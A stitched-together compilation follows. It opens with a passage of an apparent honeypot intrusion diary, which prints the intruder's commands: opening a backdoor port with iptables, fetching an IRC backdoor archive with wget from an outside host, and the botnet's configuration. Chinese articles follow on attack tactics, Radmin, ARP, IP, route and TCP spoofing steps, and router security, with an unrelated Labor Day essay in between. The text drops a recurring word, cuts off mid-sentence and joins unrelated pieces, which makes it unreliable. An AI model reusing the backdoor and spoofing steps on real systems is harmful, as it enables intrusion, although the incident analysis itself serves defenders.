-rw-r--r-- 1 free web 596730 Aug 30 05:51 psybnc.jpg

-rw-r--r-- 1 free web 895785 Sep 2 07:26 scan.tar

-rw-r--r-- 1 free web 26510 Sep 1 12:09 x.tar.gz

-rw-r--r-- 1 free web 10141 Sep 2 07:26 za.tgz

After logging out, the intruder immediately re-login again at 2333 hrs from Z.Z.Z.Z.

The reason being that his psybnc irc system control backdoor at TCP port 65500 is not working. Thus, he typed the following commands to workaround this handicap. He was probably too lazy to probe the ports opened to the Internet at the border firewall.

Command SequenceExplanationcd /tmpChange directory to /tmpsbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPTAttempting to update iptables to allow access to port 65500 but failed because he missed out the / at the front/sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPTSecond attempt to update iptables to allow access to port 65500 simply because he isn't root with superuser privileges.wget E.E.E.E/emech.tar.gzNext, he downloads emech irc backdoor archive from E.E.E.E. He probably chose another irc backdoor client because he thought the problem lies with his earlier psybnc irc backdoor toolkit. Instead of attempting any of the local privilege escalation exploits provided by local.tar.gz he downloaded in his earlier session, he downloaded emech.tar.gz which is another irc backdoor toolkit.tar zxvf emech.tar.gzUntaring the emech.tar.gz irc backdoor archiverm -rf mech.tar.gzHe failed to remove the archive, because of typo i.e. missed the “e” in front.cd mechChange directory to emech directory extracted from emech.tar.gz./mechLaunch mech backdoorexitThis time exit only once was successful.

This logon session took 11 mins.

Checking out emesh.

The IRC configuration file of emech i.e. mech.session has this:

hasonotice

nick Free`Bnc

login woot

ircname Who am I ?

modes ix

cmdchar

userfile emech.users3

set BANMODES 2

set OPMODES 2

set CTIMEOUT 90

set CDELAY 30

tog SPY 1

channel #[snipped]dea

channel #[snipped]eam

channel #[snipped]rum

channel #[snipped]gia

set MDL 3

set MBL 3

set MKL 3

set FL 3

set MAL 2

tog RK 1

tog PROT 1

tog KS 1

set AVOICE 1

nick PutMeUp

login hack

ircname Powerd By Romanian Hackers

modes ix

cmdchar

userfile emech.users2

set BANMODES 2

set OPMODES 2

set CTIMEOUT 90

set CDELAY 30

tog SPY 1

channel #[snipped]dea

channel #[snipped]eam

channel #[snipped]rum

channel #[snipped]gia

set MDL 3

set MBL 3

set MKL 3

set FL 3

set MAL 2

tog RK 1

tog PROT 1

tog KS 1

set AVOICE 1

nick Ascultat

login root

ircname 0,1Protected by National #[snipped]rum Team !!!

modes ix

cmdchar

userfile emech.users1

set BANMODES 2

set OPMODES 2

set CTIMEOUT 90

set CDELAY 30

tog SPY 1

channel #[snipped]rum

channel #[snipped]gia

set MDL 3

set MBL 3

set MKL 3

set FL 3

set MAL 2

tog RK 1

tog PROT 1

tog KS 1

set AVOICE 1

nick FavoritX

login cool

ircname Missing You Baby...

modes ix

cmdchar

userfile emech.users

set BANMODES 2

set OPMODES 2

set CTIMEOUT 90

set CDELAY 30

tog SPY 1

channel #[snipped]rum

channel #[snipped]gia

set MDL 3

set MBL 3

set MKL 3

set FL 3

set MAL 2

tog RK 1

tog PROT 1

tog KS 1

set AVOICE 1

[Post-sorted for ease of identification]

[Servers using TCP/6667]

server F.F.F.2 6667

server G.G.G.133 6667

server H.H.H.H 6667

server I.I.I.150 6667

server J.J.J.246 6667

server K.K.K.100 6667

server L.L.L.33 6667

[Servers using TCP/7000]

server M.M.M.248 7000

[Servers using TCP/8888]

server N.N.N.2 8888

From the configuration file, we can identify all the IRC servers used for the botnet as well as IRC backdoor accounts that have joined the large botnet. Use of above IRC servers is further proven from the pcap traces.

These are some of IRC backdoor accounts that have joined the large botnet.IP addresses indicate the IP addresses of compromised IRC botnet zombies.

[Details have been snipped due to sensitivity reasons]

Multiple different entries of: ~cool@[snipped]

~hack@[snipped]

~root@[snipped]

~woot@[snipped]

[Other entries snipped]

What caught my attention most is~woot@Z.Z.Z.Z (This is the system that compromised our honeypot!)

The IRC channels used and verifiedin pcap traces are:

channel #[snipped]rum

channel #[snipped]eam

channel #[snipped]dea

channel #[snipped]gia

Here's a couple of thepcap traces:

07:57:05.188294 F.F.F.2.ircd >X.X.X.X.38408: P 3217:4347(1130) ack 179 win 28

96(DF)

[Details snipped]

07:57:05.944658 F.F.F.2.ircd >X.X.X.X.38408: . 5435:6883(1448) ack 179 win 28

96(DF)

[Details snipped]

Beyond the compromise, there are observably quite a fair bit of FTP scanning.

Taking just one of the hosts that scanned us i.e. G.G.G.146, it looks like a harmless FTP probe to check for the availability of the service. Since the FTP service is not enabled on honeypot-rhl, perhaps our next activity should be to enable this service to capture and observe a successful compromise of it.

FTP scanning:

6 O.O.O.146

4 P.P.P.104

3 Q.Q.Q.202

2 R.R.R.57

2 S.S.S.130

Conclusion

This is our first honeypot compromise and it has already proved to be most interesting. Further details (without compromising sensitivity) might be offered by other duty analyzers in the next few days. In the near future, the team will work on various configurations to track and understand blackhats.

References:

[1] www.security.org.sg/gtec/honeynet/viewdiary.php?diary=20040921

Count Intrusion attempt

107 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 15) Scanner(fixed: 0 sliding: 0)

106 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 30) Scanner(fixed: 0 sliding: 0)

80 Portscan detected from X.X.X.X Talker (fixed: 15 sliding: 29) Scanner(fixed: 0 sliding: 0)

80 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 14) Scanner(fixed: 0 sliding: 0)

79 Portscan detected from X.X.X.X Talker(fixed: 1 sliding: 30) Scanner(fixed: 0 sliding: 0)

33 ICMP Destination Unreachable Port Unreachable

31 BACKDOOR typot trojan traffic

24 CHAT IRC message

24 BAD-TRAFFIC loopback traffic

22 SHELLCODE x86 NOOP

12 SIG^2 GTEC-honeynet - Possible NACHI worm ICMP ECHO traffic

11 MS-SQL Worm propagation attempt

10 ICMP Echo Reply

7 ICMP PING

3 ICMP PING NMAP

3 CHAT IRC nick change

2 (spp_stream4) possible EVASIVE RST detection

1 WEB-MISC bad HTTP/1.1 request, Potentially worm attack

1 WEB-MISC WebDAV search access

1 WEB-IIS view source via translate header

1 SHELLCODE x86 setgid 0

1 ATTACK-RESPONSES 403 Forbidden

1 (http_inspect) OVERSIZE REQUEST-URI DIRECTORY

1 (http_inspect) BARE BYTE UNICODE ENCODING

Country sources of attacks

9 China (CN)

6 United States of America (US)

3 Singapore (SG)

2 South Korea (KR)

2 Japan (JP)

1 Turkey (TR)

1 Trinidad and Tobago (TT)

1 Netherlands (NL)

1 Latvia (LV)

1 Italy (IT)

1 Germany (DE)

1 Chile (CL)

1 Brazil (BR)

1 Austria (AT)

1 Australia (AU)

篇2：网络孙子兵法！ 攻防也有三十六计

我们已知道了木马、扫描器和嗅探器的相关知识，其实 工具远不至于此，还有诸如损人不利己的网络炸弹，专门针对QQ的 工具(象什么QQ密码终结者、用于远程攻击的QicqSpy、QQ炸弹OICQShield等)，还有拒绝服务攻击(Ddos等)、IP欺骗攻击、Web欺骗、DNS欺骗攻击等等，简直比古龙小说里的十大恶人还要可恶，让我们回过头再看看 们是怎么攻击的，同时我们又应该如何拿起身边的武器，奋起反抗。

1. 混水摸鱼VS釜底抽薪

们可能会在你的机器上启动一个伪造系统登录界面的程序，来进行狸猫换太子。不明底细的你多半会误入这个“贼窝”，当你在这个伪装的界面上输入用户名、密码以后，该伪登录程序会在后台把你录入的机密信息偷偷地传送到 们的机器上，然后提示一个出错信息说“用户名与密码不符，请重新登录”。此后，才会出现真正的登录界面。

怎么样，可怕吧?应对方法就是釜底抽薪,强制在登录时必须要按Ctrl+Alt+Del才能调出登录窗口，方法是进入“开始菜单→管理工具 →本地安全策略”，打开“本地安全设置”对话框，再依次进入“本地策略 →安全选项”，双击右边详细窗格里的“禁用按Ctrl+Alt+Del进行登录的设置”，当然要禁止它。这样就可以防止 混水摸鱼了。

还有一个方法就是启用防火墙，它的一个重要作用就是防止非法用户登录你的机器上。例如可以进行端口过滤，以禁止外部主机Telnet到内部主机上。

还有一种类似的攻击，比如说正在用IE等浏览器在互联网上遨游，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等，充分享受网络带来的便利。然而你恐怕不会想到有这些问题存在:正在访问的网页已经被 篡改过，网页上的信息是虚假的!例如 将用户要浏览的网页的URL改写为指向 自己的服务器，当用户浏览目标网页的时候，实际上是向 服务器发出请求，那么 就可以达到欺骗的目的了。预防的方法就是尽量不要上不可靠的网站，如果一定要上，也要察看一下网页的源代码，看看是不是假的，并且禁止IE的脚本支持和ActiveX控件。

2.李代桃僵VS顺蔓摸瓜

们可能会通过代理服务器来攻击你，狡猾的 还会使用800电话的无人转接服务来连接ISP，然后再盗用他人的帐号上网。也许在他到来之前，他已经使用了好几个跳板了。就算你费了九牛二虎之力查到了攻击者的IP，但可能和你一样，也是个受害者。

尽管不一定有用，但建议你这样做，有总比没有好:启用Windows 里的事件审核功能，要知道，缺省情况是不记录任何审核事件的!方法嘛，还是进入“本地安全设置”，打开“本地策略 →审核策略”双击右边详细窗格里的“审核登录事件”，选中其中的“成功”、“失败”事件，然后把里面的象什么“审核对象访问”、“审核帐户登录访问”所有的都选上，不要怕浪费磁盘空间，如果被 攻占了等于你的磁盘就是他的了，就更加浪费。

3.偷梁换柱VS关门捉贼

以前讲过， 们可以通过嗅探器得到你的敏感信息，这类方法有一定的局限性，比如说要在你的网段里种一个嗅探器，但其危害性极大。 们可以轻松获取你的帐户和密码。目前有很多协议根本就没有采用任何加密或身份认证技术，如在Telnet、FTP、HTTP、SMTP等传输协议中，用户帐户和密码信息都是以明文格式传输的，这就给攻击者带来了很多便利，此时若攻击者利用数据包截取工具例如Iris便可很容易收集到你的机密数据。还有一种中途截击攻击方法更为狡诈，它可以在你同服务器端完成“三次握手”建立连接之后，在通信过程中扮演“第三者”的角色，假冒服务器身份欺骗你，再假冒你向服务器发出恶意请求，其造成的后果不堪设想。另外，攻击者有时还会利用软件和硬件工具时刻监视系统主机的工作，等待记录用户登录信息，从而取得用户密码;或者编制有缓冲区溢出错误的SUID程序来获得超级用户权限。

对这种方法首先要篱笆扎的严，同一个网段里的机器应该是可以互相信任的，同时借助一些反嗅探器工具例如AntiSniffer之类的对网络进行实时监控。

4.美人计VS诱敌深入

前面说过，木马程序因为生得短小精悍，所以深得 们的青睐，尽管骨灰级的高手常不屑于使用，但是统计表明，百分之六十的 攻击是采用木马，

木马程序可以直接潜入你的电脑并进行破坏，它常常把自己装成一副游戏或者MP3的嘴脸来诱使你打开它们，一旦你双击了带有特洛伊木马程序的邮件附件或从网上直接下载的貌似合法的程序，它们就会留在电脑中，并且可以让自己随Windows而启动。当你连接到互联网上时，这个程序就会通知 (通过邮件或者即时消息)，告知你的IP地址和可以攻击端口。 收到这些信息后，使用木马的客户端程序，和潜伏在你机器里的服务器程序里应外合，可以任意地修改你的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

要破除木马使的美人计，首先不要随意打开来历不明的电子邮件及文件，不要随便运行不太了解的人给你的程序，比如“特洛伊木马”之类的 程序就需要骗你运行。尽量避免从Internet下载不知名的软件、游戏程序。即使从知名的网站下载的软件也要及时用最新的病毒和木马查杀软件对软件和系统进行扫描。查到木马程序以后，也不要急着将它推出午门斩首，先逼出口供再说，你可以用netstat命令看看谁在与你连接，然后可以分析这个木马，看看它里面的通知选项里写的是谁的电子邮件地址，就可以对他进行反惩罚了。

5.借刀杀人―DDos攻击

DDos攻击，是指分布式拒绝服务攻击，从许多分布的主机同时攻击一个目标主机，从而导致它彻底瘫痪，好多著名的网站，象Yahoo、Buy.com、Amazon等都受到过这种“百鸟朝凤”的待遇。分布式拒绝服务攻击采用的是四层客户机/服务器架构，处于最顶层的是目标主机，而首脑攻击者处于最低层，与第二层的攻击服务器(数量比较少，约几台到几十台)相连，然后由攻击服务器把首脑攻击者的攻击命令分布到第三层的攻击执行器(数目很大)上，攻击执行器实施对目标主机的攻击。攻击服务器的作用主要是隔离攻击者与网络直接联系，减少被发现的可能性，同时可以协调进攻。攻击执行器主要运行一些简单的程序，可以向目标主机发出雪崩数据，而且不要求ACK(回应)。

首脑攻击者多半是由一台普通主机充当，甚至可能是一台笔记本电脑，这样它的位置可能是不固定的，它用来向攻击服务器发出攻击特定目标的指令。攻击执行器接到攻击命令以后，发出大量数据包骚扰目标主机，而且这种数据包还经过伪装，无法辨认它们的源地址。很快目标主机就会资源耗尽而崩溃。

目前这一招还没有直接有效的应对方法:只能先防患于未燃。

首先确保服务器安装了最新服务包，打上了所有最新的安全补丁，建议使用英文版的操作系统，因为英文版的操作系统比中文版的Bug要少得多，而且各种服务包、补丁、漏洞资料也发布得要快得多，被攻击的案例大多起因于漏洞没有补好。

其次系统管理员要对关键系统的所有外围主机进行检查，而不仅针对关键系统。也就是说要保证一般的外围主机不会被 控制。一旦 直接控制了外围主机，那将十分可怕。要确保系统管理员知道每个外围主机系统在运行什么操作系统?都有哪些人在使用它们?哪些人可以访问它们?要做到心中有数，不要等到 攻击了，才想到要去查，已经晚了。

一些未使用的服务，例如Telnet、Ftp、Smtp等，会用明文显示密码、帐号。就应该果断让它们下岗，并且确保封住它们的端口，以防它们死灰复燃。以前讲过 通过IPC$攻击就可能获得超级用户的权限，并能访问其他系统，不管是不是受防火墙保护。

如果是Unix主机，则要确保所有的守护服务都有TCP封装程序，并限制对主机的访问权限。

最好不要让内部网通过“小猫”访问互联网。否则， 们很容易通过电话线发现未受保护的主机，马上就可以实行攻击。

限制在防火墙外进行网络文件共享。这会使 有机会截获系统文件，并以特洛伊木马替换它，文件传输功能无异将陷入瘫痪。

可以以毒攻毒，在防火墙上运行扫描器程序。大多数攻击事件是由于防火墙配置不当造成的，使DDoS攻击成功率很高，所以要用扫描器好好地看看到底有哪些不明端口敞开着，同时也可以看看有哪些漏洞，你可以用前面说过的流光检查一下。

即时检查所有网络设备和主机/服务器系统的日志。只要日志出现异常或者有被人改动、删除的痕迹，那么就可以怀疑主机已经受到 的光顾。

尽管以上的方法并不是直接有效，但是篱笆扎得牢了，就能最大限度地防止各类 工具的侵袭，其中自然也包括分布式拒绝服务攻击(DDos)。

篇3：Radmin网络攻防全面接触

Radmin是一款世界知名的远程控制软件，其完全控制、文件传输、Telnet命令等功能非常好用，在Radmin3.0以前版本中，杀毒软件都不对其进行查杀，后期由于 和病毒的大量使用r_server来作为媒介，因此将R_server做为安全威胁处理，目前一些以主动防御为主的杀毒软件以及防火墙会主动将R_server列为黑名单，尽管如此Radmin还是深受网络安全者的喜爱。有关Radmin 的研究国内安全组织有很多文章和作品，例如radmin hash连接器，即只要获取了radmin的密码hash值通过该软件可以直接进行连接，而不需知道其密码。

本文将从网络攻防的角度来介绍Radmin软件，通过本文读者可以掌握很多有关Radmin攻击和防护的知识。

一、Radmin简介

Radmin是Remote Administrator的简称， (www.radmin.com)解释为PC Remote Control Software and Remote Access Software(PC远程控制和远程访问软件)，它是一款屡获殊荣的远程控制软件，目前最新版本为3.4，它将远程控制、外包服务组件、以及网络监控结合到一个系统里，提供目前为止最快速、强健而安全的工具包。

(一)主要特点 1.最高工作速度

Radmin目前是最快的远程控制软件。它的Direct Screen Transfer?技术采用了视频挂钩内核模式驱动程序，将捕捉率提高到每秒数百次屏幕更新。通过其特别的低带宽优化功能，可以在使用拨号调制解调器和 GPRS 连接的情况下，顺心地进行工作。

2.最高安全级别

Radmin以加密模式工作，为每个连接到远程计算机的所有数据，屏幕图像，鼠标移动和键盘信号采用随机生成的密钥256位AES强加密。可以使用 Windows Security 或 Radmin Security。Windows 安全性支持对特定用户使用不同的权限，或对主域、可信域和活动目录的用户组使用不同的权限。 支持自动使用登录用户凭证和 Kerberos 验证。Radmin 安全性支持对添加到 Radmin Server 访问列表的用户使用不同的权限。 Radmin 用户验证使用新的基于 Diffie-Hellman 的密钥交换，密钥长度 2048 位，

IP Filter 仅允许从特定 IP 地址和网络访问 Radmin Server。添加到日志文件的 DNS 名称和用户名信息。智能防护密码猜测，五次密码登录错误后自动进行延迟。

3.硬件支持英特尔? AMT新产品远程控制!

Radmin 3.4版本支持英特尔? AMT(主动管理技术)，它允许远程计算机控制，即使是关闭或无法启动操作系统。可以使用Radmin浏览器打开，重新启动和关闭远程计算机。它还使用户能够查看和修改远程计算机的BIOS设置并启动它从本地CD或磁盘映像文件。

4.全面兼容Windows 7新功能!

Radmin的3.4完全支持Windows 7 32位和64位，包括用户帐户控制和快速用户切换。 Radmin的服务器3.4支持Windows 7/Vista/XP///2000(32位)和Windows 7/Vista/XP/2008/2003(64位)操作系统。 Radmin的播放器3.4支持Windows 7/Vista/XP/2008/2003/2000/ME/98/95/NT4.0(32位)和Windows 7/Vista/XP/2008/2003(64位)操作系统。

5.操作简单，支持多连接

Radmin支持被控端以服务的方式运行、支持多个连接和IP 过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于Windows NT的安全支持及密码保护以及提供日志文件支持等。Radmin 目前支持TCP/IP协议，应用十分广泛。

(二)软件组成

Radmin软件分为服务端(Radmin Server)和浏览器端(Radmin Viewer)两个部分，在早期版本中这两个部分是集成到一起的，在3.0以后版本将其分开了。浏览器端(Radmin Viewer)也即Radmin.exe，服务端(Radmin Server)也即早期R_server.exe部分，在后续版本中增加了一些新的功能，同时服务端名称进行了更改，服务端主程序由R_server.exe更名为rserver3.exe。其安装文件路径由“C:\Program Files\Radmin”变为“C:\WINDOWS\system32server30”，共有25个主要程序文件。

篇4：网络协议欺骗攻防小结

在网络的虚拟环境中和现实中一样，各种各样的人都有，各种各样的欺骗技术也都横行，笔者最近闲来无事总结了一下常见的欺骗技术和防范的方法。希望对广大读者有所帮助。

一、ARP欺骗

ARP协议用于IP地址到MAC地址的转换，此映射关系存储在ARP缓存表中，若ARP缓存表被他人非法修改，则会导致发送给正确主机的数据包发送给另外一台由攻击者控制的主机。ARP欺骗(ARP spoofing)，也叫ARP毒药(ARP poison)，即可完成这些功能。

假设攻击者和目标主机在同一个局域网中，并且想要截获和侦听目标主机到网关间的所有数据。当然，对于使用集线器的局域网环境，攻击者只需要把网卡设置为混杂模式即可。但是现在的局域网都是交换机了，不仅可以提高局域网的容量，而且可以提高安全性。在这种情况下，攻击者首先会试探交换机是否存在失败保护模式(fail-safe mode)，是交换机所处的特殊模式状态。交换机维护IP地址和MAC地址的映射关系时会花费一定处理能力，当网络通信时出现大量虚假MAC地址时，某些类型的交换机会出现过载情况，从而转换到失败保护模式。若交换机不存在失败保护模式，则需要使用ARP欺骗技术。

攻击者主机需要两块网卡，IP地址分别是192.168.0.5和192.168.0.6，插入交换机的两个端口，准备截获和侦听目标主机192.168.0.3和路由器192.168.0.1之间的所有通信。另外攻击者主机还需要有IP数据包转发功能，此项功能在Linux下只需要执行命令echo 1>/proc/sys/net/ipv4/ip_forward就可以。以192.168.0.4的网络通信为例，正常的ARP转换如下：

1.主机A192.168.0.4想要与路由器192.168.0.1通信，从而接入Internet。

2.主机A以广播的方式发送ARP请求，希望得到路由器的MAC。

3.交换机收到ARP请求，并把此请求发送给连接到交换机的各个主机。同时，交换机将更新它的MAC地址和端口之间的映射表，即将192.168.0.4绑定它所连接的端口。

4.路由器收到A的ARP请求后，发出带有自身MAC地址的ARP响应。

5.路由器更新ARP缓存表，绑定A的IP地址和MAC地址。

6.交换机收到了路由器对A的ARP响应后，查找它的MAC地址和端口之间的映射表，把此ARP响应数据包发送到相应的端口。同时，交换机更新它的MAC地址和端口之间的影射表，即将192.168.0.1绑定它所连接的端口。

7.主机A收到ARP响应数据包，更新ARP缓存表，绑定路由器的IP地址和MAC地址。

8.主机A使用更新后的MAC地址信息把数据发送给路由器，通信通道就此建立。

ARP欺骗需要攻击者迅速地诱使目标主机192.168.0.3和路由器192.168.0.1都和它建立通信，从而使自己成为中间人MiM(Man in Middle)。换句话说，攻击者的主机此时相当于一个被攻击者完全控制的路由器，目标主机和路由器之间的所有数据通信都要由攻击者主机转发，攻击者也就能对数据作各种处理。要达到同时欺骗目标主机和路由器的目的，攻击者应打开两个命令界面，执行两次ARP欺骗：一次诱使目标主机认为攻击者的主机有路由器的MAC地址，这可以利用IP地址欺骗技术，伪造路由器的IP地址，从攻击者主机的一块网卡上发送给目标主机ARP请求包，则错误的MAC地址和IP地址的映射将更新到目标主机;另一次使路由器相信攻击者的主机具有目标主机的MAC地址，方法和前面相似。

ARP欺骗的防范：

中毒的网络，就会一直有发送arp病毒包的，这些arp病毒包会误导你的机器对网关mac地址的解析。所以需要绑定mac地址。两种方法：

1、列出局域网内所有机器的MAC地址。

# arpAddress HWtype HWaddress Flags Mask Iface

192.168.1.1 ether 00:07:E9:2A:6F:C6，然后，绑定MAC地址， #arp -s 192.168.1.1 00:07:E9:2A:6F:C6

注意：假如用户的网关设置了hostname的话，这里192.168.1.1就有可能需要换成hostname。

2、创建一个/etc/ethers文件，比如你要绑定网关，那就在/etc/ethers里写上：192.168.1.1 00:07:E9:2A:6F:C6，然后执行 #arp -f ，每次重启机器后需要重新绑定MAC地址。

另外，mac地址的绑定需要双向的，即机器a绑定了机器b，机器b也要绑定机器a，这样arp病毒才会被彻底挡住。

二、IP地址欺骗

IP地址欺骗就是攻击者假冒他人IP地址，发送数据包。因为IP协议不对数据包中的IP地址进行认证，因此任何人不经授权就可以伪造IP包的源地址。

IP包一旦从网络中发送出去，源IP地址就几乎不用，仅在中间路由器因某种原因丢弃它或到达目标端后，才被使用。这使得一个主机可以使用别的主机的IP地址发送IP包，只要它能把这类IP包放到网络上就可以，

因而，如果攻击者把自己的主机伪装成被目标主机信任的好友主机，即把发送的IP包中的源IP地址改成被信任的友好主机的IP地址，利用主机间的信任关系和这种信任关系的实际认证中存在的脆弱性(只通过IP确认)，就可以对信任主机进行攻击。注意其中所说的信任关系是指一个被授权的主机可以对信任主机进行方便的访问。例如Unix中的所有的R*命令都采用信任主机方案，所以一个攻击主机把自己的IP改为被信任主机的IP，就可以连接到信任主机，并能利用R*命令开后门达到攻击的目的。

想要实现IP地址欺骗要注意以下两个问题：

1.因为远程主机只向伪造的IP地址发送应答信号，攻击者不可能收到远程主机发出的信息，即用C主机假冒B主机IP，连接远程主机A，A主机只向B主机发送应答信号，C主机无法收到;

2.要在攻击者和被攻击者之间建立连接，攻击者需要使用正确的TCP序列号。

攻击者使用IP地址欺骗的目的主要有两种：

1.只想隐藏自身的IP地址或伪造源IP和目的IP相同的不正常包，而并不关心是否能收到目标主机的应答，例如IP包碎片、Land攻击等;

2.伪装成被目标主机信任的友好主机得到非授权的服务。解决办法：目前最理想的方法是使用防火墙，防火墙决定是否允许外部的IP数据包进入局域网，对来自外部的IP数据包进行检验。假如来自外部的数据包声称有内部地址，它一定是欺骗包。如果数据包的IP地址不是防火墙内的任何子网，它就不能离开防火墙。

三、路由欺骗

TCP/TP网络中，IP包的传输路径完全由路由表决定。若攻击者通过各种手段改变路由表，使目标主机发送的IP包到达攻击者能控制的主机或路由器，就可以完成侦听，篡改等攻击方式。

1.RIP路由欺骗

RIP协议用于自治系统内传播路由信息。路由器在收到RIP数据报时一般不作检查。攻击者可以声称他所控制的路由器A可以最快的到达某一站点B，从而诱使发往B的数据包由A中转。由于A受攻击者控制，攻击者可侦听、篡改数据。

RIP路由欺骗的防范措施主要有：路由器在接受新路由前应先验证其是否可达。这可以大大降低受此类攻击的概率。但是RIP的有些实现并不进行验证，使一些假路由信息也能够广泛流传。由于路由信息在网上可见，随着假路由信息在网上的传播范围扩大，它被发现的可能性也在增大。所以，对于系统管理员而言，经常检查日志文件会有助于发现此类问题。

2.IP源路由欺骗

IP报文首部的可选项中有“源站选路”，可以指定到达目的站点的路由。正常情况下，目的主机如果有应答或其他信息返回源站，就可以直接将该路由反向运用作为应答的回复路径。

主机A(假设IP地址是192.168.100.11)是主机B(假设IP地址为192.168.100.1)的被信任主机，主机X想冒充主机A从主机B获得某些服务。首先，攻击者修改距离X最近的路由器G2，使用到达此路由器且包含目的地址192.168.100.1的数据包以主机X所在的网络为目的地;然后，攻击者X利用IP欺骗(把数据包的源地址改为192.168.100.11)向主机B发送带有源路由选项(指定最近的G2)的数据包。当B回送数据包时，按收到数据包的源路由选项反转使用源路由，传送到被更改过的路由器G2。由于G2路由表已被修改，收到B的数据包时，G2根据路由表把数据包发送到X所在的网络，X可在其局域网内较方便地进行侦听，收取此数据包。

防范IP源路由欺骗的好方法主要有：

1.配置好路由器，使它抛弃那些由外部网进来的、声称是内部主机的报文;

2.关闭主机和路由器上的源路由功能。

四、TCP欺骗

实现TCP欺骗攻击有两种方法：

1.非盲攻击

攻击者和被欺骗的目的主机在同一个网络上，攻击者可以简单地使用协议分析器(嗅探器)捕获TCP报文段，从而获得需要的序列号。以下是其攻击步骤：

(1)攻击者X要确定目标主机A的被信任主机B不在工作状态，若其在工作状态，也使用SYN flooding等攻击手段使其处于拒绝服务状态。

(2)攻击者X伪造数据包：B->A：SYN(ISN C)，源IP地址使用B，初始序列号ISN为C，给目标主机发送TCP的SYN包，请求建立连接。

(3)目标主机回应数据包：A->B：SYN(ISN S)，ACK(ISN C)，初始序列号为S，确认序号为C。由于B处于拒绝服务状态，不会发出响应包。攻击者X使用嗅探工具捕获TCP报文段，得到初始序列号S。

(4)攻击者X伪造数据包：B->A:ACK(ISN S),完成三次握手建立TCP连接。

(5)攻击者X一直使用B的IP地址与A进行通信。

2.盲攻击

由于攻击者和被欺骗的目标主机不在同一个网络上，攻击者无法使用嗅探工具捕获TCP报文段。其攻击步骤与非盲攻击几乎相同，只不过在步骤(3)中无法使用嗅探工具，可以使用TCP初始序列号预测技术得到初始序列号。在步骤(5)中，攻击者X可以发送第一个数据包，但收不到A的响应包，较难实现交互。

从攻击者的角度来考虑，盲攻击比较困难，因为目的主机的响应都被发送到不可达的被欺骗主机，攻击者不能直接确定攻击的成败。然而，攻击者可使用路由欺骗技

篇5：五一劳动节资料英文

Labor Day， the first Monday in September， is a creation of the labor movement and is dedicated to the social and economic achievements of American workers. It constitutes a yearly national tribute to the contributions workers have made to the strength五一劳动节的由来， prosperity， and well-being of our country.

Founder of Labor Day

More than 100 years after the first Labor Day observance， there is still some doubt as to who first proposed the holiday for workers.

Some records show that Peter J. McGuire， general secretary of the Brotherhood of Carpenters and Joiners and a cofounder of the American Federation of Labor， was first in suggesting a day to honor those “who from rude nature have delved and carved all the grandeur we behold.”

But Peter McGuire“s place in Labor Day history has not gone unchallenged. Many believe that Matthew Maguire， a machinist， not Peter McGuire， founded the holiday. Recent research seems to support the contention that Matthew Maguire， later the secretary of Local 344 of the International Association of Machinists in Paterson， N.J.， proposed the holiday in 1882 while serving as secretary of the Central Labor Union in New York. What is clear is that the Central Labor Union adopted a Labor Day proposal and appointed a committee to plan a demonstration and picnic.

The first Labor Day holiday was celebrated on Tuesday， September 5， 1882， in New York City， in accordance with the plans of the Central Labor Union. The Central Labor Union held its second Labor Day holiday just a year later， on September 5,1883.

In 1884 the first Monday in September was selected as the holiday， as originally proposed， and the Central Labor Union urged similar organizations in other cities to follow the example of New York and celebrate a ”workingmen“s holiday” on that date. The idea spread with the growth of labor organizations， and in 1885 Labor Day was celebrated in many industrial centers of the country.

Labor’s Day is on May 1st. Labor’s Day is an international day for workers. Working is glorious， and we should respect workers. The Labor’s Day is workers’ holiday and workers can enjoy themselves to their heart’s content. Many people choose to travel. And some others will go to the cinema. Some will go to parks. And others will stay at home.

篇6：网络路由安全攻防对策分析及实践

网络路由器的安全问题一直以来被大家谈论得比较多，虽然我们看到的路由器入侵事件不多，因此在很多人的印象中，路由(routing)只是选择通过互联网络从源节点向目的节点传输信息的通道，其实路由器的安全隐患很多，只是由于一般黑客接触得不太频繁，被攻击的事件很少发生，但如果路由器被攻击，后果将不堪设想。

不可忽视的路由器安全

路由器（router）是因特网上最为重要的设备之一，正是遍布世界各地的数以万计的路由器构成了因特网这个在我们的身边日夜不停地运转的巨型信息网络的 “桥梁”。在因特网上，路由器扮演着转发数据包“驿站”的角色，对于黑客来说，利用路由器的漏洞发起攻击通常是一件比较容易的事情，攻击路由器会浪费 cpu周期，误导信息流量，使网络陷于瘫痪，通常好的路由器本身会采取一个好的安全机制来保护自己，但是仅此一点是远远不够的，保护路由器安全还需要网管员在配置和管理路由器过程中采取相应的安全措施。

流行的路由器大多是以硬件设备的形式存在的，但是在某些情况下也用程序来实现“软件路由器”，两者的唯一差别只是执行的效率不同而已。路由器一般至少和两个网络相联，并根据它对所连接网络的状态决定每个数据包的传输路径。路由器生成并维护一张称为“路由信息表”的表格，其中跟踪记录相邻其他路由器的地址和状态信息。

路由器使用路由信息表并根据传输距离和通讯费用等优化算法来决定一个特定的数据包的最佳传输路径。正是这种特点决定了路由器的“智能性”，它能够根据相邻网络的实际运行状况自动选择和调整数据包的传输情况，尽最大的努力以最优的路线和最小的代价将数据包传递出去。路由器能否安全稳定地运行，直接影响着因特网的活动，不管因为什么原因出现路由器死机、拒绝服务或是运行效率急剧下降，其结果都将是灾难性的。

路由器的安全剖析

路由器的安全性分两方面，一方面是路由器本身的安全，另一方面是数据的安全。由于路由器是互联网的核心，是网络互连的关键设备，所以路由器的安全要求比其他设备的安全性要求更高，主机的安全漏洞最多导致该主机无法访问，路由器的安全漏洞可能导致整个网络不可访问。

路由器的安全漏洞可能存在管理上的原因和技术上的原因。在管理上，对路由器口令糟糕的选择、路由协议授权机制的不恰当使用、错误的路由配置都可能导致路由器工作出现问题，技术上路由器的安全漏洞可能有恶意攻击，如窃听、流量分析、假冒、重发、拒绝服务、资源非授权访问、干扰、病毒等攻击。此外，还有软件技术上的漏洞，诸如后门、操作系统漏洞、数据库漏洞、tcp/ip协议漏洞、网络服务等都可能会存在漏洞。

